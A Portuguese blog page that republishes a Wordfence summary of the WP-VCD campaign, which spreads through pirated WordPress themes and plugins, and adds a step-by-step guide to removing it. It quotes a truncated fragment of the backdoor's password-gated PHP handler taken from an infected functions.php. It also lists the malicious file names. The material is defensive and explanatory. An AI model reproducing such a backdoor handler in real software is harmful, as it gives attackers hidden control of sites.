Matheus Carcasa Web Gestão de TI / Web / EaD
Desde 2002, seus parceiros na Web.
Enviar
logo

WP-VCD: o malware que ataca WordPress

Esta entrada foi publicada em Pesquisa , Segurança do WordPress em 4 de novembro de 2019 por Mikey Veenstra.

Uma das infecções por malware mais comuns que o ecossistema do WordPress enfrenta nas últimas semanas é uma campanha conhecida como WP-VCD. Apesar da existência relativamente longa da campanha, a equipe de inteligência de ameaças do Wordfence associou o WP-VCD a uma maior taxa de novas infecções do que qualquer outro malware do WordPress todas as semanas desde agosto de 2019, e a campanha não mostra sinais de desaceleração.

No post de hoje, estamos publicando um white paper abrangente analisando o WP-VCD . Este whitepaper contém todos os detalhes de nossos esforços de pesquisa nessa campanha predominante. Ele foi desenvolvido como um recurso para analistas de ameaças, pesquisadores de segurança, desenvolvedores e administradores do WordPress e qualquer pessoa interessada em rastrear ou impedir o comportamento associado ao WP-VCD.

WP-VCD em resumo
A infecção WP-VCD em si é transmitida por plug-ins e temas “anulados” ou pirateados distribuídos por uma rede de sites relacionados, e é notável na maneira como se propaga após a implantação. Nos bastidores, a extensa infraestrutura de comando e controle (C2) e as infecções de autocorreção permitem que os invasores mantenham uma posição persistente nesses sites infectados.

<?php
if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘2f3ad13e4908141130e292bf8aa67474’))
{
$div_code_name=”wp_vcd”;
switch ($_REQUEST[‘action’])
{
case ‘change_domain’;
if (isset($_REQUEST[‘newdomain’]))

 

O snippet de código acima foi originado de um arquivo functions.php infectado em um site comprometido pelo WP-VCD. Devido à prevalência da campanha, é provável que este exemplo seja imediatamente reconhecido por qualquer pessoa com experiência em lidar com infecções por malware do WordPress.

Detalhes completos e análise de código da campanha WP-VCD podem ser encontrados no relatório completo.

Infraestrutura, monetização e atribuição
Em vários pontos de sua história, recursos específicos foram adicionados e removidos do malware, mas a maioria dos componentes principais do WP-VCD permaneceu consistente. A monetização vem de duas fontes principais: atividade de marketing viral destinada a manipular resultados de mecanismos de pesquisa por meio de SEO black hat e código de malvertising que cria redirecionamentos potencialmente perigosos e anúncios pop-up para usuários que visualizam um site comprometido.

No whitepaper, fornecemos algumas dicas sobre a extensão da infraestrutura e do esquema de monetização do WP-VCD. Também revelamos dados que fornecem atribuição ao agente de ameaças por trás da campanha.

Indicadores de compromisso (COI)
Para ajudar a comunidade de segurança na prevenção, detecção e erradicação de infecções por WP-VCD, fornecemos uma extensa lista de COI associados a esta campanha. Também compartilhamos algumas regras de detecção de malware compatíveis com YARA para uso público na identificação de sites infectados.

Leia o relatório completo
O escopo completo de nossa investigação sobre o WP-VCD excede em muito o de uma postagem típica de um blog de pesquisa; portanto, leia o whitepaper completo:

WP-VCD: o malware que você instalou em seu próprio site .

 

 

Resolva o ataque de malware WP-VCD

Se você foi vítima de um ataque de malware, sabe como pode ser doloroso se livrar dessas sanguessugas traquinas. Recentemente, um dos sites que eu administrei foi vítima de um vírus WP-VCD Malware. O que eu pensei que seria um processo irritantemente longo para consertar, na verdade não levou muito tempo.

Como o WP-VCD trava em um site?

Existem várias maneiras pelas quais o malware pode se conectar ao seu site, as formas mais comuns para os ataques de vertente de malware WP-VCD são:

  • Baixando e instalando temas gratuitos do WordPress piratas premium e instalando-os.
  • Baixando e instalando plugins desonestos gratuitos.

Os desenvolvedores criam portas traseiras para o software acima, o que deixa seu site vulnerável a ataques no futuro.

No meu caso, baixei um tema premium gratuitamente por um tempo para testá-lo antes de comprá-lo. Parece que uma porta dos fundos foi incorporada ao código e se espalhou por todas as instalações locais, mesmo as mais recentes.

“Importante: Não baixe temas e plugins premium de graça!”

Veja como corrigi-lo de maneira rápida e fácil.

1. Identifique o tipo de malware

Se você identificou o vírus do malware e tem certeza de que seu WP-VCD, prossiga para a etapa 2. Se não tiver certeza, os seguintes sintomas podem ajudá-lo a solucionar esta etapa. 

  • Seu site está apresentando um erro de status de cabeçalho 500 por um motivo incomum.
  • Examine o diretório do seu domínio, se você encontrar um arquivo wp-vcd.php no diretório / wp-includes /. provavelmente é o WP-WCD. 

Se você ainda não tiver certeza, tente usar a  verificação de segurança do site e o scanner de malware gratuitos da Sucuri  para identificar o problema.

2. Crie um backup

Entre no seu cliente FTP e crie um backup dos arquivos do seu site no seu local. mantenha-os sem modificação, caso você exclua um arquivo e precise ser substituído. 

3. Exclua os seguintes arquivos maliciosos

Para os especialistas em malware WP-WCD que começaram a excluir os seguintes arquivos – deixei comentários da minha correção real para usar como orientação sobre o que funcionou para mim.

  • Excluir:class.theme-modules.php eclass.plugin-modules.php
    • Não foi possível encontrar esses arquivos, procurei em toda a pasta – o local desses arquivos não foi especificado.
  • Navegue até wp-includes e delete estes arquivos:
    • wp-includes/wp-vcd.php – Este é o arquivo principal que injeta o vírus nos outros arquivos
    • wp-includes/class.wp.php– Não excluiu este, pois quebrou os estilos no site. Eu o inspecionei para encontrar injeções de wcd e nada foi encontrado.
    • wp-includes/wp-cd.php – Este arquivo também não foi encontrado.
    • wp-includes/wp-feed.php – Excluído sem problemas
    • wp-includes/wp-tmp.php – Excluído sem problemas

4. Excluir código malicioso do arquivo Theme Functions.php

    • Navegue até o local do arquivo do tema para encontrar o functions.phparquivo do tema . O caminho geralmente se parece com:
      \wp-content\themes\{choose your active theme}
    • Abra o  functions.php arquivo e remova o código do malware.
    • Geralmente, são cerca de 150 ou mais linhas inseridas na primeira função 

código wp-vcd no arquivo functions.php

  • Salve e você deve estar pronto!

5. Excluir usuários suspeitos

Verifique os usuários do banco de dados e os usuários do site WP para ver se foram criadas contas suspeitas. Exclua estes.

6. Instale a proteção no seu site

Instale um plugin do WordPress para ajudar a identificar e proteger seu site contra malware. Eu recomendo o Wordfence Security – Firewall & Malware Scan , que ajuda a identificar e bloquear malware.

 

Publicações relacionadas

Comments are closed.